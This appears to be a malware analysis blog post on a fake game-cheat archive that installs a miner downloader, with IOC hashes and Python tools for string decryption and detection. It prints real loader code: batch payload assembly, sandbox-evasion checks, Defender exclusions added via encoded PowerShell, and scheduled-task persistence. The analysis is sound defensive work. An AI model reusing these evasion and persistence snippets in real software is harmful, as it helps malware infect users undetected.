11.03.2025

Ongoing series: #1 #2 #3

yet another youtube games cheat update

One more day, a few new channels, video uploads and updated malware download links later (not on Google, where the old links remain online), a new version of the mechanism for deploying the final payload has appeared.

Laynch3r_Tool(v1.27).rar Archive

One of the new versions is the Laynch3r_Tool(v1.27).rar archive (SHA256: 512324DDA0B893CD2E61D7061BBB2A1832022F4D588B8B36D02062CF445416AC).

    Mode                 LastWriteTime         Length Name
    ----                 -------------         ------ ----
    d----          29/11/2024    15:03                apt
    d----          29/11/2024    15:04                binfmts
    d----          11/03/2025    17:33                gems
    d----          29/11/2024    15:07                ispell
    d----          01/09/2019    21:29                misc
    d----          29/11/2024    15:05                mlocate
    d----          29/11/2024    15:00                pam
    d----          29/11/2024    15:03                ucf
    d----          29/11/2024    14:59                usbutils
    -a---          11/04/2012    00:15        7174216 agcore1.dll
    -a---          11/03/2025    17:31      134217723 L__Tool.exe
    -a---          06/07/2023    09:01       25640324 plugins.tut
    -a---          24/01/2025    14:07       51278143 safes.tut
    -a---          12/06/2020    08:41        4982272 System.Windows.dll

None of the files except L__Tool.exe (SHA256: E10B8BA80EDBD15983D71E55B11C70466DDD65621A4CC6C774DDF1F68E2E16B5) have been changed. Everything else in the archive can therefore be considered filler material to evade antivirus scanners and will be disregarded. Only the executable will be examined in more detail below.

L__Tool.exe Binary

Due to the file size, the initial assumption was that it might be a bloated file. Accordingly, I attempted to use the debloat tool by Squiblydoo to remove any filler material. Instead, the tool conveniently indicated that this was an NSIS installer and extracted all associated files. The extracted setup.nsis file describes what the installer does once executed. Besides several commands meant solely for bloating and evading antivirus detection, it contains some critical actions. One key action is the extraction of various vsdx files from the installer (debloat extracted these as well, which simplifies analysis).

    4F EXTRACTFILE      $05000090, 'Smile.vsdx', $000E01E8, $FFFFFFFF, $FFFFFFFF, $FFFFFFD9
    62 ASSIGNVAR        5, ' expand Smile.vs', 0, 0
    73 ASSIGNVAR        4, 'x Smile.vsdx.bat', 0, 0
    78 SHELLEXEC        'open', '$SHELL:SYSDIR\\cmd.exe', '/c$V5d$V4 & Smile.vsdx.bat', 0, $0500, 'open $SHELL:SYSDIR\\cmd.exe'

Most of the files are not used (yet); the only one referenced in the script is Smile.vsdx (SHA256: E00561A394A08CE872FC8B24257DE445A5BB2BA2D91A6DB2005F27398B0761EC). Interestingly, this file is not actually a Visio file but an obfuscated batch script. Additionally, two variables (4 & 5) are assigned values that are later combined into a command by inserting the character d between them. This results in the final command being executed via cmd: expand Smile.vsdx Smile.vsdx.bat & Smile.vsdx.bat, which writes a copy of the file with the .bat extension and then runs the script.

Smile.vsdx.bat Script

In this obfuscated script, several commands are composed from variables and executed. For example, some parts of the archive file named Ebook.vsdx are extracted, which are then assembled into a binary called Monetary.com. This binary turns out to be the AutoIt v3 interpreter. Furthermore, other seemingly Visio files extracted by the installer are combined into an encrypted AutoIt script called D, located in the 802867 subfolder.

    extrac32 /Y /E Ebook.vsdx
    cmd /c copy /b 802867\Monetary.com + Concentrate + Tc + Emily + Mandate + Wp + Pb + Confirmation + Cruz + Did + Context 802867\Monetary.com
    cmd /c copy /b ..\Texts.vsdx + ..\Conservative.vsdx + ..\Ebony.vsdx + ..\Finds.vsdx + ..\Unit.vsdx + ..\Closer.vsdx + ..\Contractor.vsdx + ..\Literature.vsdx D
    start Monetary.com D

This AutoIt script (SHA256: C6376008DF4F0519E7C4D24F5FFAC73C21BA68816F98CC9F10393C7542D010D7) is then executed via the start command and the Monetary.com binary. A very similar approach has been described by Trend Micro in their blog post.

D Encrypted AutoIt Script

Utilizing the myAut2Exe decompiler, I was able to revert this script to an au3 script and make it readable. This resulted in an obfuscated file with a lot of unnecessary filler loops and function calls. The core of the obfuscated code is an encryption function (FLYCHANGELOG) that is used hundreds of times throughout the script. Therefore, the first goal was to reverse this function so that the rest of the script could be decrypted.

    FUNC FLYCHANGELOG($POSINGOLIVE,$CONTINUEDRACHEL)
        $MICROWAVERENEWABLE=""
        $SAYINGACKNOWLEDGE=CALL(STRINGREVERSE("tilpSgnirtS"),$POSINGOLIVE,"B",2)
        FOR $PANICPARTICULARLY=386-386 TO CALL("UBound",$SAYINGACKNOWLEDGE)-1
            $MICROWAVERENEWABLE&=CHRW($SAYINGACKNOWLEDGE[$PANICPARTICULARLY]-$CONTINUEDRACHEL)
        NEXT
        RETURN $MICROWAVERENEWABLE
    ENDFUNC

This is a simple function that splits every string passed to it at the character B and shifts it by a magic number. A simple reverse function in Python, along with a test value from the script, looks as follows:

    def decrypt(encrypted_input, magic_number):
        decrypted = ""
        encrypted = list(map(int, encrypted_input.split("B")))
        for character in encrypted:
            decrypted += chr(character - magic_number)
        return decrypted

    decoded_string = decrypt("104B123B115B111B114B117B104B117B49B104B123B104", 3)
    print(decoded_string) # explorer.exe
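Since the function is called hundreds of times, the practical next step is to apply the reverse function to the whole decompiled source at once. The following Python is an added example, not code from the original post: it finds every FLYCHANGELOG("...", n) call with a regular expression and replaces it with the recovered string literal. The OBFUSCATED_SAMPLE input is constructed in the style of the decompiled script (it is not an excerpt of the real sample), and the argument layout is assumed to match the test value shown above.

```python
import re

# Reverse of FLYCHANGELOG: split the digit string on "B" and subtract the per-call shift.
def flychangelog_decrypt(encoded: str, shift: int) -> str:
    return "".join(chr(int(code) - shift) for code in encoded.split("B"))

# One FLYCHANGELOG("104B123B...", 3) call, allowing arbitrary whitespace around the arguments.
# AutoIt function names are case-insensitive, hence re.IGNORECASE.
CALL_RE = re.compile(r'FLYCHANGELOG\(\s*"((?:\d+B)*\d+)"\s*,\s*(\d+)\s*\)', re.IGNORECASE)

def deobfuscate_script(source: str) -> str:
    """Replace every FLYCHANGELOG("...", n) call in an au3 source with the plaintext literal."""
    def repl(match: re.Match) -> str:
        plain = flychangelog_decrypt(match.group(1), int(match.group(2)))
        # AutoIt escapes a double quote inside a double-quoted string by doubling it.
        return '"' + plain.replace('"', '""') + '"'
    return CALL_RE.sub(repl, source)

# Constructed sample in the style of the decompiled script (not taken from the real sample):
# it encodes EnvGet and COMPUTERNAME with shift 5 and the analysis-host name tz with shift 7.
OBFUSCATED_SAMPLE = '''IF CALL(FLYCHANGELOG("74B115B123B76B106B121", 5), FLYCHANGELOG("72B84B82B85B90B89B74B87B83B70B82B74", 5)) = FLYCHANGELOG("123B129", 7) THEN
    EXIT
ENDIF
'''

if __name__ == "__main__":
    print(deobfuscate_script(OBFUSCATED_SAMPLE))
```

Running the script on the constructed sample yields the readable check IF CALL("EnvGet", "COMPUTERNAME") = "tz" THEN, which is the form the host-name checks below appear in after decryption.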

After decrypting the strings, further obfuscation methods are found (e.g., hundreds of while loops with switch-case statements) that attempt to hide the script’s contents. Among other things, the script checks the computer name and username and terminates under certain conditions (e.g., if the computer name is tz, NfZtFbPfH, or ELICZ, or if the username is test22 — well-known names of antivirus analysis hosts, as noted in this blog post by CrowdStrike).

    (CALL(EnvGet,COMPUTERNAME)=tz)(CALL(WinClose,CALL(AutoItWinGetTitle)))(OPT(TrayIconHide,1))
    (CALL(EnvGet,COMPUTERNAME)=NfZtFbPfH)(CALL(WinClose,CALL(AutoItWinGetTitle)))(OPT(TrayIconHide,1))
    (CALL(EnvGet,COMPUTERNAME)=ELICZ)(CALL(WinClose,CALL(AutoItWinGetTitle)))(OPT(TrayIconHide,1))
    (CALL(EnvGet,USERNAME)=test22)(CALL(WinClose,CALL(AutoItWinGetTitle)))(OPT(TrayIconHide,1))

Additionally, the script checks whether it is running on a 64-bit system and can load different binaries depending on the architecture. In this case, only one binary (stored in the $SJUCASMNE variable) is available, for 64-bit systems. It is decompressed and loaded using ntdll.dll. Overall, this is the result of packing the payload with the CypherIT Packer/Crypter.

Final Payload

After the infostealer activity, the final payload is executed: a well-known miner downloader named Task32Main.exe, which prepares the system for further cryptomining. Within this .NET application, PowerShell is used to add various Defender exclusions, and powercfg is used to prevent the system from entering standby mode.

    string arguments = " /C powershell -EncodedCommand \"" + Convert.ToBase64String(Encoding.Unicode.GetBytes(string.Concat(new string[]
    {
        "<#",
        Fregat.RS(Fregat.rnd.Next(2, 12), true),
        "#> Add-MpPreference <#",
        Fregat.RS(Fregat.rnd.Next(2, 12), true),
        "#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#",
        Fregat.RS(Fregat.rnd.Next(2, 12), true),
        "#> -Force <#",
        Fregat.RS(Fregat.rnd.Next(2, 12), true),
        "#>"
    }))) + "\" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off";
    Process.Start(new ProcessStartInfo("cmd.exe")
    {
        Arguments = arguments,
        UseShellExecute = false,
        CreateNoWindow = true,
        WindowStyle = ProcessWindowStyle.Hidden,
        Verb = "runas"
    });

Additionally, this loader ensures persistence by creating scheduled tasks within the AutoStart function, which execute the corresponding files loaded through the DAF function.

    public static string string_2 = Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData) + "\\" + "Dllhost\\";
    processStartInfo.Arguments = string.Concat(new string[] {
        " /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN \"",
        "dllhost",
        "\" /TR \"",
        Fregat.string_2,
        "dllhost.exe\""
    });

    string[] array3 = new string[] {
        "NvStray"
    };
    processStartInfo.Arguments = string.Concat(new string[] {
        " /c SCHTASKS /CREATE /SC HOURLY /TN \"",
        "NvStray",
        "\\",
        "NvStray",
        "Service_bk",
        Convert.ToString(random.Next(10000)),
        "\" /TR \"",
        Fregat.string_2,
        "dllhost.exe\""
    });

Further details on this (well-known) approach and more in-depth descriptions of the miner watchdog can also be found in the blog post by Fortinet.
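From the defender's side, both the exclusion snippet and the scheduled-task snippet above leave recognisable process command lines. The following Python is an added example (not code from the post or from the loader): it decodes a powershell -EncodedCommand argument, strips the random <# ... #> block comments that pad the Add-MpPreference call, and tags lines that add Defender exclusions, disable standby via powercfg, or register a SCHTASKS entry pointing at the Dllhost folder under ProgramData. The sample command lines, the encode_ps helper and the tag names are constructed for this example.

```python
import base64
import re

def encode_ps(script: str) -> str:
    """PowerShell -EncodedCommand expects base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample process command lines modelled on the loader behaviour shown above
# (random-length <# ... #> comments around Add-MpPreference, powercfg standby changes,
# and a 5-minute SCHTASKS entry under ProgramData\Dllhost); the last line is a benign control.
SAMPLE_CMDLINES = [
    "cmd.exe /C powershell -EncodedCommand " + encode_ps(
        "<#qzL#> Add-MpPreference <#ab#> -ExclusionPath @($env:UserProfile,$env:SystemDrive)"
        " <#xj#> -Force <#k#>") + " & powercfg /hibernate off",
    'cmd.exe /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\\ProgramData\\Dllhost\\dllhost.exe"',
    "powershell -Command Get-Date",
]

# -EncodedCommand and its short forms -enc / -e, followed by the base64 blob.
ENCODED_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
BLOCK_COMMENT_RE = re.compile(r"<#.*?#>", re.DOTALL)

def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand script, or "" if the line carries none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def strip_block_comments(script: str) -> str:
    """Drop <# ... #> comments (the loader's filler) and normalise whitespace."""
    return " ".join(BLOCK_COMMENT_RE.sub(" ", script).split())

def classify(cmdline: str) -> list:
    """Tag a command line with the loader behaviours described on this page that it exhibits."""
    findings = []
    script = strip_block_comments(decode_encoded_command(cmdline)) or cmdline
    if re.search(r"\bAdd-MpPreference\b.*-ExclusionPath", script, re.IGNORECASE):
        findings.append("defender_exclusion_added")
    if re.search(r"\bpowercfg\b.*(?:-standby-timeout|-hibernate-timeout|/hibernate off)", cmdline, re.IGNORECASE):
        findings.append("sleep_disabled")
    if re.search(r"\bschtasks\s+/create\b.*ProgramData\\Dllhost\\dllhost\.exe", cmdline, re.IGNORECASE):
        findings.append("dllhost_scheduled_task")
    return findings

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(classify(line), line[:70])
```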